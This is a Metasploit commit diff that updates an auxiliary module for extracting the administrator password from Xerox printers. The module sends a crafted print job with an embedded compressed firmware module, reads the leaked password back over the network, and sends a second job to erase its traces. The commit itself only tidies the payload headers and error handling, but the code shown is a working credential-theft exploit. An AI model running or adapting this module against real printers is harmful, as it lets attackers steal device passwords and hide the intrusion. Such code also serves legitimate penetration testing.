Updated get_once for get_once undefined method and EOFError

parzamendi-r7 · parzamendi-r7 · commit b35a8935db65 · 2014-10-29T13:47:07.000-05:00
diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb
@@ -2,8 +2,6 @@
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
-require 'rex/proto/http'
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
@@ -62,36 +60,16 @@ def run
   #Trigger firmware bootstrap write out password data to URL root
   def write
     print_status('Sending print job')
-    create_print_job = "\x25\x25\x58\x52\x58\x62\x65\x67\x69\x6e\x0a\x25\x25\x4f\x49\x44"
-    create_print_job << "\x5f\x41\x54\x54\x5f\x4a\x4f\x42\x5f\x54\x59\x50\x45\x20\x4f\x49"
-    create_print_job << "\x44\x5f\x56\x41\x4c\x5f\x4a\x4f\x42\x5f\x54\x59\x50\x45\x5f\x44"
-    create_print_job << "\x59\x4e\x41\x4d\x49\x43\x5f\x4c\x4f\x41\x44\x41\x42\x4c\x45\x5f"
-    create_print_job << "\x4d\x4f\x44\x55\x4c\x45\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54"
-    create_print_job << "\x5f\x4a\x4f\x42\x5f\x53\x43\x48\x45\x44\x55\x4c\x49\x4e\x47\x20"
-    create_print_job << "\x4f\x49\x44\x5f\x56\x41\x4c\x5f\x4a\x4f\x42\x5f\x53\x43\x48\x45"
-    create_print_job << "\x44\x55\x4c\x49\x4e\x47\x5f\x41\x46\x54\x45\x52\x5f\x43\x4f\x4d"
-    create_print_job << "\x50\x4c\x45\x54\x45\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f"
-    create_print_job << "\x4a\x4f\x42\x5f\x43\x4f\x4d\x4d\x45\x4e\x54\x20\x22\x4d\x6f\x6e"
-    create_print_job << "\x20\x4e\x6f\x76\x20\x31\x34\x20\x31\x33\x3a\x35\x30\x3a\x32\x31"
-    create_print_job << "\x20\x45\x53\x54\x20\x32\x30\x31\x31\x22\x0a\x25\x25\x4f\x49\x44"
-    create_print_job << "\x5f\x41\x54\x54\x5f\x4a\x4f\x42\x5f\x43\x4f\x4d\x4d\x45\x4e\x54"
-    create_print_job << "\x20\x22\x70\x61\x74\x63\x68\x20\x4d\x6f\x6e\x20\x4a\x75\x6c\x20"
-    create_print_job << "\x32\x39\x20\x31\x35\x3a\x33\x33\x3a\x34\x37\x20\x45\x44\x54\x20"
-    create_print_job << "\x32\x30\x31\x33\x22\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f"
-    create_print_job << "\x44\x4c\x4d\x5f\x4e\x41\x4d\x45\x20\x22\x78\x65\x72\x6f\x78\x22"
-    create_print_job << "\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f\x44\x4c\x4d\x5f\x56"
-    create_print_job << "\x45\x52\x53\x49\x4f\x4e\x20\x22\x4e\x4f\x5f\x44\x4c\x4d\x5f\x56"
-    create_print_job << "\x45\x52\x53\x49\x4f\x4e\x5f\x43\x48\x45\x43\x4b\x22\x0a\x25\x25"
-    create_print_job << "\x4f\x49\x44\x5f\x41\x54\x54\x5f\x44\x4c\x4d\x5f\x53\x49\x47\x4e"
-    create_print_job << "\x41\x54\x55\x52\x45\x20\x22\x38\x62\x61\x30\x31\x39\x38\x30\x39"
-    create_print_job << "\x39\x33\x66\x35\x35\x66\x35\x38\x33\x36\x62\x63\x63\x36\x37\x37"
-    create_print_job << "\x35\x65\x39\x64\x61\x39\x30\x62\x63\x30\x36\x34\x65\x36\x30\x38"
-    create_print_job << "\x62\x66\x38\x37\x38\x65\x61\x62\x34\x64\x32\x66\x34\x35\x64\x63"
-    create_print_job << "\x32\x65\x66\x63\x61\x30\x39\x22\x0a\x25\x25\x4f\x49\x44\x5f\x41"
-    create_print_job << "\x54\x54\x5f\x44\x4c\x4d\x5f\x45\x58\x54\x52\x41\x43\x54\x49\x4f"
-    create_print_job << "\x4e\x5f\x43\x52\x49\x54\x45\x52\x49\x41\x20\x22\x65\x78\x74\x72"
-    create_print_job << "\x61\x63\x74\x20\x2f\x74\x6d\x70\x2f\x78\x65\x72\x6f\x78\x2e\x64"
-    create_print_job << "\x6e\x6c\x64\x22\x0a\x25\x25\x58\x52\x58\x65\x6e\x64\x0a\x1f\x8b"
+    create_print_job = '%%XRXbegin' + "\x0a"
+    create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a"
+    create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a"
+    create_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0a"
+    create_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0a"
+    create_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0a"
+    create_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0a"
+    create_print_job << '%%OID_ATT_DLM_SIGNATURE "8ba01980993f55f5836bcc6775e9da90bc064e608bf878eab4d2f45dc2efca09"' + "\x0a"
+    create_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0a"
+    create_print_job << '%%XRXend' + "\x0a\x1f\x8b"
     create_print_job << "\x08\x00\x80\xc3\xf6\x51\x00\x03\xed\xcf\x3b\x6e\xc3\x30\x0c\x06"
     create_print_job << "\x60\xcf\x39\x05\xe3\xce\x31\x25\xa7\x8e\xa7\x06\xe8\x0d\x72\x05"
     create_print_job << "\x45\x92\x1f\x43\x2d\x43\x94\x1b\x07\xc8\xe1\xab\x16\x28\xd0\xa9"
@@ -111,7 +89,7 @@ def write
     begin
       connect(true, 'RPORT' => datastore['JPORT'].to_i)
       sock.put(create_print_job)
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse 
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
       print_error("Error connecting to #{rhost}")
       return
     ensure
@@ -126,10 +104,10 @@ def retrieve
     begin
       connect
       sock.put(request)
-      res = sock.get_once
+      res = sock.get_once || ''
       passwd = res.match(/\r\n\s(.+?)\n/)
       return passwd ? passwd[1] : ''
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
+    rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError
       print_error("Error getting password from #{rhost}")
       return
     ensure
@@ -140,36 +118,16 @@ def retrieve
   # Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL
   def remove
     print_status('Removing print job')
-    remove_print_job = "\x25\x25\x58\x52\x58\x62\x65\x67\x69\x6e\x0a\x25\x25\x4f\x49\x44"
-    remove_print_job << "\x5f\x41\x54\x54\x5f\x4a\x4f\x42\x5f\x54\x59\x50\x45\x20\x4f\x49"
-    remove_print_job << "\x44\x5f\x56\x41\x4c\x5f\x4a\x4f\x42\x5f\x54\x59\x50\x45\x5f\x44"
-    remove_print_job << "\x59\x4e\x41\x4d\x49\x43\x5f\x4c\x4f\x41\x44\x41\x42\x4c\x45\x5f"
-    remove_print_job << "\x4d\x4f\x44\x55\x4c\x45\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54"
-    remove_print_job << "\x5f\x4a\x4f\x42\x5f\x53\x43\x48\x45\x44\x55\x4c\x49\x4e\x47\x20"
-    remove_print_job << "\x4f\x49\x44\x5f\x56\x41\x4c\x5f\x4a\x4f\x42\x5f\x53\x43\x48\x45"
-    remove_print_job << "\x44\x55\x4c\x49\x4e\x47\x5f\x41\x46\x54\x45\x52\x5f\x43\x4f\x4d"
-    remove_print_job << "\x50\x4c\x45\x54\x45\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f"
-    remove_print_job << "\x4a\x4f\x42\x5f\x43\x4f\x4d\x4d\x45\x4e\x54\x20\x22\x4d\x6f\x6e"
-    remove_print_job << "\x20\x4e\x6f\x76\x20\x31\x34\x20\x31\x33\x3a\x35\x30\x3a\x32\x31"
-    remove_print_job << "\x20\x45\x53\x54\x20\x32\x30\x31\x31\x22\x0a\x25\x25\x4f\x49\x44"
-    remove_print_job << "\x5f\x41\x54\x54\x5f\x4a\x4f\x42\x5f\x43\x4f\x4d\x4d\x45\x4e\x54"
-    remove_print_job << "\x20\x22\x70\x61\x74\x63\x68\x20\x4d\x6f\x6e\x20\x4a\x75\x6c\x20"
-    remove_print_job << "\x32\x39\x20\x31\x35\x3a\x34\x31\x3a\x34\x35\x20\x45\x44\x54\x20"
-    remove_print_job << "\x32\x30\x31\x33\x22\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f"
-    remove_print_job << "\x44\x4c\x4d\x5f\x4e\x41\x4d\x45\x20\x22\x78\x65\x72\x6f\x78\x22"
-    remove_print_job << "\x0a\x25\x25\x4f\x49\x44\x5f\x41\x54\x54\x5f\x44\x4c\x4d\x5f\x56"
-    remove_print_job << "\x45\x52\x53\x49\x4f\x4e\x20\x22\x4e\x4f\x5f\x44\x4c\x4d\x5f\x56"
-    remove_print_job << "\x45\x52\x53\x49\x4f\x4e\x5f\x43\x48\x45\x43\x4b\x22\x0a\x25\x25"
-    remove_print_job << "\x4f\x49\x44\x5f\x41\x54\x54\x5f\x44\x4c\x4d\x5f\x53\x49\x47\x4e"
-    remove_print_job << "\x41\x54\x55\x52\x45\x20\x22\x38\x62\x35\x64\x38\x63\x36\x33\x31"
-    remove_print_job << "\x65\x63\x32\x31\x30\x36\x38\x32\x31\x31\x38\x34\x30\x36\x39\x37"
-    remove_print_job << "\x65\x33\x33\x32\x66\x62\x66\x37\x31\x39\x65\x36\x31\x31\x33\x62"
-    remove_print_job << "\x62\x63\x64\x38\x37\x33\x33\x63\x32\x66\x65\x39\x36\x35\x33\x62"
-    remove_print_job << "\x33\x64\x31\x35\x34\x39\x31\x22\x0a\x25\x25\x4f\x49\x44\x5f\x41"
-    remove_print_job << "\x54\x54\x5f\x44\x4c\x4d\x5f\x45\x58\x54\x52\x41\x43\x54\x49\x4f"
-    remove_print_job << "\x4e\x5f\x43\x52\x49\x54\x45\x52\x49\x41\x20\x22\x65\x78\x74\x72"
-    remove_print_job << "\x61\x63\x74\x20\x2f\x74\x6d\x70\x2f\x78\x65\x72\x6f\x78\x2e\x64"
-    remove_print_job << "\x6e\x6c\x64\x22\x0a\x25\x25\x58\x52\x58\x65\x6e\x64\x0a\x1f\x8b"
+    remove_print_job = '%%XRXbegin' + "\x0A"
+    remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
+    remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
+    remove_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0A"
+    remove_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
+    remove_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
+    remove_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
+    remove_print_job << '%%OID_ATT_DLM_SIGNATURE "8b5d8c631ec21068211840697e332fbf719e6113bbcd8733c2fe9653b3d15491"' + "\x0A"
+    remove_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
+    remove_print_job << '%%XRXend' + "\x0a\x1f\x8b"
     remove_print_job << "\x08\x00\x5d\xc5\xf6\x51\x00\x03\xed\xd2\xcd\x0a\xc2\x30\x0c\xc0"
     remove_print_job << "\xf1\x9e\x7d\x8a\x89\x77\xd3\x6e\xd6\xbd\x86\xaf\x50\xb7\xc1\x04"
     remove_print_job << "\xf7\x41\xdb\x41\x1f\xdf\x6d\x22\x78\xd2\x93\x88\xf8\xff\x41\x92"
@@ -186,7 +144,7 @@ def remove
     begin
       connect(true, 'RPORT' => datastore['JPORT'].to_i)
       sock.put(remove_print_job)
-    rescue
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
       print_error("Error removing print job from #{rhost}")
       return
     ensure
